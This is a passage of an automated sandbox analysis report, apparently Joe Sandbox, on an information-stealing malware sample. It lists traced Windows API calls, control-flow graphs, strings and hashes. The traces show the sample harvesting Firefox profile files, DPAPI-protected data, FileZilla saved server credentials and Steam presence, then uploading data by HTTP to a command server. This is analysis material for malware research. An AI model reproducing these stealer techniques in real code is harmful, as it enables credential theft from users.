                                                                                                                    • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                  • FindFirstFileA.KERNEL32(?,?,00437570,004368A3,?,?,?), ref: 0040D647
                                                                                                                  • StrCmpCA.SHLWAPI(?,00437574), ref: 0040D668
                                                                                                                  • StrCmpCA.SHLWAPI(?,00437578), ref: 0040D682
                                                                                                                  • StrCmpCA.SHLWAPI(?,prefs.js,0043757C,?,004368AE), ref: 0040D70E
                                                                                                                    • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                                  • CopyFileA.KERNEL32(?,?,00000001), ref: 0040D7E8
                                                                                                                  • DeleteFileA.KERNEL32(?), ref: 0040D8B3
                                                                                                                  • FindNextFileA.KERNELBASE(?,?), ref: 0040D956
                                                                                                                  • FindClose.KERNEL32(?), ref: 0040D96A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextSystemTimelstrlen
                                                                                                                  • String ID: prefs.js
                                                                                                                  • API String ID: 893096357-3783873740
                                                                                                                  • Opcode ID: 41633527efff258655262d476ebd01a72874a665415db562b1b65d312d844474
                                                                                                                  • Instruction ID: 927356911e44c3405f4de0d2be1bd74ddf2f7452577bbc1ac17ea627ea54bfb8
                                                                                                                  • Opcode Fuzzy Hash: 41633527efff258655262d476ebd01a72874a665415db562b1b65d312d844474
                                                                                                                  • Instruction Fuzzy Hash: 38A11C71D001289BCF60FB65DD46BCD7375AF04318F4101EAA808B7292DB79AEC98F99
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                    • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                    • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                    • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                    • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                    • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                    • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                  • FindFirstFileA.KERNEL32(?,?,00437424,00436822,?,?,?), ref: 0040B657
                                                                                                                  • StrCmpCA.SHLWAPI(?,00437428), ref: 0040B678
                                                                                                                  • StrCmpCA.SHLWAPI(?,0043742C), ref: 0040B692
                                                                                                                  • StrCmpCA.SHLWAPI(?,00437430,?,00436823), ref: 0040B71F
                                                                                                                  • StrCmpCA.SHLWAPI(?), ref: 0040B780
                                                                                                                    • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                    • Part of subcall function 0040ABE5: CopyFileA.KERNEL32(?,?,00000001), ref: 0040AC8A
                                                                                                                  • FindNextFileA.KERNEL32(?,?), ref: 0040B8EB
                                                                                                                  • FindClose.KERNEL32(?), ref: 0040B8FF
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: lstrcpy$FileFind$lstrcat$CloseCopyFirstNextlstrlen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3801961486-0
                                                                                                                  • Opcode ID: c2ed2a2b921503af2e1bda992e97388ccf911cd7dd1c3e3f35522dbd33dae0d6
                                                                                                                  • Instruction ID: de252c0fab1b0e9a2d3383b13184952b75e93cbc882370f7403094166be9312a
                                                                                                                  • Opcode Fuzzy Hash: c2ed2a2b921503af2e1bda992e97388ccf911cd7dd1c3e3f35522dbd33dae0d6
                                                                                                                  • Instruction Fuzzy Hash: 7E812C7290021C9BCF20FB75DD46ADD7779AB04308F4501A6EC48B3291EB789E998FD9
                                                                                                                  APIs
                                                                                                                  • __EH_prolog3_catch_GS.LIBCMT ref: 004124B2
                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004124D4
                                                                                                                  • Process32First.KERNEL32(00000000,00000128), ref: 004124E4
                                                                                                                  • Process32Next.KERNEL32(00000000,00000128), ref: 004124F6
                                                                                                                  • StrCmpCA.SHLWAPI(?,steam.exe), ref: 00412508
                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00412521
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Process32$CloseCreateFirstH_prolog3_catch_HandleNextSnapshotToolhelp32
                                                                                                                  • String ID: steam.exe
                                                                                                                  • API String ID: 1799959500-2826358650
                                                                                                                  • Opcode ID: 3cb6e8a710d4498e8812abe57448e33dc0f290ad47eb1370d56b55ec382773d2
                                                                                                                  • Instruction ID: 012bf4d8d1ff090a25d7979138f5f9e06e77e1c880a3c2a583d4811a910fbd8f
                                                                                                                  • Opcode Fuzzy Hash: 3cb6e8a710d4498e8812abe57448e33dc0f290ad47eb1370d56b55ec382773d2
                                                                                                                  • Instruction Fuzzy Hash: 17012170A01224DFDB74DB64DD44BDE77B9AF08311F8001E6E409E2290EB388F90CB15
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                  • GetKeyboardLayoutList.USER32(00000000,00000000,0043670D,?,?), ref: 00410E0C
                                                                                                                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 00410E1A
                                                                                                                  • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00410E28
                                                                                                                  • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,00000000), ref: 00410E57
                                                                                                                    • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                    • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                    • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                    • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                  • LocalFree.KERNEL32(00000000), ref: 00410EFF
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000463000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000467000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000582000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000063A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000670000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: lstrcpy$KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcatlstrlen
                                                                                                                  • String ID: /
                                                                                                                  • API String ID: 507856799-4001269591
                                                                                                                  APIs
                                                                                                                  • __EH_prolog3_catch_GS.LIBCMT ref: 00412589
                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0000013C,00417E31,.exe,00436CCC,00436CC8,00436CC4,00436CC0,00436CBC,00436CB8,00436CB4,00436CB0,00436CAC,00436CA8,00436CA4), ref: 004125A8
                                                                                                                  • Process32First.KERNEL32(00000000,00000128), ref: 004125B8
                                                                                                                  • Process32Next.KERNEL32(00000000,00000128), ref: 004125CA
                                                                                                                  • StrCmpCA.SHLWAPI(?), ref: 004125DC
                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 004125F0
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Process32$CloseCreateFirstH_prolog3_catch_HandleNextSnapshotToolhelp32
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1799959500-0
                                                                                                                  APIs
                                                                                                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,0040823B), ref: 004080C4
                                                                                                                  • LocalAlloc.KERNEL32(00000040,0040823B,?,?,0040823B,0040CB95,?,?,?,?,?,?,?,0040CC90,?,?), ref: 004080D8
                                                                                                                  • LocalFree.KERNEL32(0040CB95,?,?,0040823B,0040CB95,?,?,?,?,?,?,?,0040CC90,?,?), ref: 004080FD
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Local$AllocCryptDataFreeUnprotect
                                                                                                                  • String ID: DPAPI
                                                                                                                  • API String ID: 2068576380-1690256801
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00436712,?,?), ref: 004114D4
                                                                                                                  • Process32First.KERNEL32(00000000,00000128), ref: 004114E4
                                                                                                                  • Process32Next.KERNEL32(00000000,00000128), ref: 00411542
                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0041154D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 907984538-0
                                                                                                                  APIs
                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00410D49
                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 00410D50
                                                                                                                  • GetTimeZoneInformation.KERNEL32(?), ref: 00410D5F
                                                                                                                  • wsprintfA.USER32 ref: 00410D7D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 362916592-0
                                                                                                                  APIs
                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004013B9), ref: 00410C5F
                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,004013B9), ref: 00410C66
                                                                                                                  • GetUserNameA.ADVAPI32(00000000,004013B9), ref: 00410C7A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Heap$AllocNameProcessUser
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1206570057-0
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: InfoSystemwsprintf
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2452939696-0
                                                                                                                  • Opcode ID: 67b530403a9dc94f78866dc1dd254330b8edc701593f238e5f24d625af2237fc
                                                                                                                  • Instruction ID: 6e5c45132ae1b45d6529ef5bd4d0c5c9796b2e2d3bf3e93bb3fd0621c026135a
                                                                                                                  • Opcode Fuzzy Hash: 67b530403a9dc94f78866dc1dd254330b8edc701593f238e5f24d625af2237fc
                                                                                                                  • Instruction Fuzzy Hash: E8E092B0D1020D9BCF04DF60EC459DE77FCEB08208F4055B5A505E3180D674AB89CF44
                                                                                                                  APIs
                                                                                                                  • lstrcmpiW.KERNEL32(?,?,?,?,?,?,00401503,avghookx.dll,00418544), ref: 004014DF
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: lstrcmpi
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1586166983-0
                                                                                                                  • Opcode ID: 01ffdcfc4a170f1596b26d300e4d9eeb94101c14574aad42e0c58a83c969e199
                                                                                                                  • Instruction ID: b529297655fd12c0b63a16027a5c7bdef515ed443d31e096b8a78f326fd23762
                                                                                                                  • Opcode Fuzzy Hash: 01ffdcfc4a170f1596b26d300e4d9eeb94101c14574aad42e0c58a83c969e199
                                                                                                                  • Instruction Fuzzy Hash: C1F08C32A00150EBCF20CF59D804AAAFBB8EB43760F257065E809B3260C334ED11EA9C

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 29 405482-405593 call 4104e7 call 410519 call 404ab6 call 411e5d lstrlenA call 411e5d call 4104e7 * 4 StrCmpCA 48 405595 29->48 49 40559b-4055a1 29->49 48->49 50 4055a3-4055b8 InternetOpenA 49->50 51 4055be-4056ce call 411c4a call 4105c7 call 41058d call 402920 * 2 call 410609 call 4105c7 call 410609 call 41058d call 402920 * 3 call 410609 call 4105c7 call 41058d call 402920 * 2 InternetConnectA 49->51 50->51 52 405e64-405eec call 402920 * 4 call 410519 call 402920 * 3 50->52 51->52 118 4056d4-405712 HttpOpenRequestA 51->118 86 405eee-405f2e call 402920 * 6 call 41d016 52->86 119 405e58-405e5e InternetCloseHandle 118->119 120 405718-40571e 118->120 119->52 121 405720-405736 InternetSetOptionA 120->121 122 40573c-405d77 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 lstrlenA * 2 GetProcessHeap HeapAlloc lstrlenA call 
427050 lstrlenA call 427050 lstrlenA * 2 call 427050 lstrlenA HttpSendRequestA HttpQueryInfoA 120->122 121->122 309 405db5-405dc5 call 411afd 122->309 310 405d79-405db0 call 4104e7 call 402920 * 3 122->310 315 405dcb-405dd0 309->315 316 405f2f 309->316 310->86 318 405e11-405e2e InternetReadFile 315->318 320 405e30-405e43 StrCmpCA 318->320 321 405dd2-405dda 318->321 324 405e45-405e46 ExitProcess 320->324 325 405e4c-405e52 InternetCloseHandle 320->325 321->320 323 405ddc-405e0c call 410609 call 41058d call 402920 321->323 323->318 325->119
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                    • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                    • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                                                    • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                                                    • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                                                    • Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                                                    • Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                                                  • lstrlenA.KERNEL32(?), ref: 00405519
                                                                                                                    • Part of subcall function 00411E5D: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,00000000,0065E908,?,?,?,004128A1,?,?,00000000), ref: 00411E7D
                                                                                                                    • Part of subcall function 00411E5D: GetProcessHeap.KERNEL32(00000000,?,?,?,?,004128A1,?,?,00000000), ref: 00411E8A
                                                                                                                    • Part of subcall function 00411E5D: HeapAlloc.KERNEL32(00000000,?,?,?,004128A1,?,?,00000000), ref: 00411E91
                                                                                                                  • StrCmpCA.SHLWAPI(?,00436986,0043697B,0043697A,0043696F), ref: 00405588
                                                                                                                  • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004055AA
                                                                                                                  • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004056C0
                                                                                                                  • HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00405704
                                                                                                                  • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405736
                                                                                                                    • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                    • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                    • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                    • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                    • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                    • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                  • lstrlenA.KERNEL32(?,",file_data,00437850,------,00437844,?,",00437838,------,0043782C,2ee1445fc63bc20d0e7966867b13e0e1,",build_id,00437814,------), ref: 00405C67
                                                                                                                  • lstrlenA.KERNEL32(?), ref: 00405C7A
                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00405C92
                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 00405C99
                                                                                                                  • lstrlenA.KERNEL32(?), ref: 00405CA6
                                                                                                                  • _memmove.LIBCMT ref: 00405CB4
                                                                                                                  • lstrlenA.KERNEL32(?,?,?), ref: 00405CC9
                                                                                                                  • _memmove.LIBCMT ref: 00405CD6
                                                                                                                  • lstrlenA.KERNEL32(?), ref: 00405CE4
                                                                                                                  • lstrlenA.KERNEL32(?,?,00000000), ref: 00405CF2
                                                                                                                  • _memmove.LIBCMT ref: 00405D05
                                                                                                                  • lstrlenA.KERNEL32(?,?,00000000), ref: 00405D1A
                                                                                                                  • HttpSendRequestA.WININET(?,?,00000000), ref: 00405D2D
                                                                                                                  • HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 00405D6F
                                                                                                                  • InternetReadFile.WININET(?,?,000007CF,?), ref: 00405E26
                                                                                                                  • StrCmpCA.SHLWAPI(?,block), ref: 00405E3B
                                                                                                                  • ExitProcess.KERNEL32 ref: 00405E46
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: lstrlen$Internetlstrcpy$Heap$HttpProcess_memmove$AllocOpenRequestlstrcat$BinaryConnectCrackCryptExitFileInfoOptionQueryReadSendString
                                                                                                                  • String ID: ------$"$"$"$"$--$------$------$------$------$2ee1445fc63bc20d0e7966867b13e0e1$ERROR$ERROR$block$build_id$file_data
                                                                                                                  • API String ID: 2638065154-3389637935
                                                                                                                  • Opcode ID: 728df9254f14c32eb0309421fbc2d51be9a45682cb524dc00f6aca4526101756
                                                                                                                  • Instruction ID: a1f310b16752a75a1e3861b17425502ee47d614580a36b5f1e1f8e1f13a41955
                                                                                                                  • Opcode Fuzzy Hash: 728df9254f14c32eb0309421fbc2d51be9a45682cb524dc00f6aca4526101756
                                                                                                                  • Instruction Fuzzy Hash: 3742E671D401699BDF21FB21DC45ACDB3B9BF04308F0085E6A548B3152DAB86FCA9F98

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                    • Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD
                                                                                                                    • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                    • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                    • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                    • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                    • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                    • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                    • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                    • Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
                                                                                                                    • Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
                                                                                                                    • Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
                                                                                                                    • Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
                                                                                                                    • Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034
                                                                                                                    • Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37
                                                                                                                  • strtok_s.MSVCRT ref: 0040E77E
                                                                                                                  • GetProcessHeap.KERNEL32(00000000,000F423F,00436912,0043690F,0043690E,0043690D), ref: 0040E7C4
                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 0040E7CB
                                                                                                                  • StrStrA.SHLWAPI(00000000,<Host>), ref: 0040E7DF
                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040E7EA
                                                                                                                  • StrStrA.SHLWAPI(00000000,<Port>), ref: 0040E81E
                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040E829
                                                                                                                  • StrStrA.SHLWAPI(00000000,<User>), ref: 0040E857
                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040E862
                                                                                                                  • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040E890
                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040E89B
                                                                                                                  • lstrlenA.KERNEL32(?), ref: 0040E901
                                                                                                                  • lstrlenA.KERNEL32(?), ref: 0040E915
                                                                                                                  • lstrlenA.KERNEL32(0040ECBC), ref: 0040EA3D
                                                                                                                    • Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                                                    • Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: lstrlen$lstrcpy$AllocFile$CreateHeapLocallstrcat$CloseFolderHandleObjectPathProcessReadSingleSizeThreadWaitstrtok_s
                                                                                                                  • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Host: $Login: $Password: $Soft: FileZilla$\AppData\Roaming\FileZilla\recentservers.xml$passwords.txt
                                                                                                                  • API String ID: 4146028692-935134978
                                                                                                                  • Opcode ID: daf18828ca77f1c77d3f07f28c52861645635e7fac20ced428b2830730ead7d9
                                                                                                                  • Instruction ID: 2e9f852a615408e756f1d7d3730d5668bfc6bf7d6dc94c0724fe4efb67adb4f0
                                                                                                                  • Opcode Fuzzy Hash: daf18828ca77f1c77d3f07f28c52861645635e7fac20ced428b2830730ead7d9
                                                                                                                  • Instruction Fuzzy Hash: 6FA17572A40219BBCF01FBA1DD4AADD7775AF08305F105426F501F30A1EBB9AE498F99

                                                                                                                  Control-flow Graph

                                                                                                                  [Control-flow graph figure, starting at node 451 (406bb5-406c7a); legend: Executed / Not Executed. Node and edge listing omitted.]
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                    • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                                                    • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                                                    • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                                                    • Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                                                    • Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
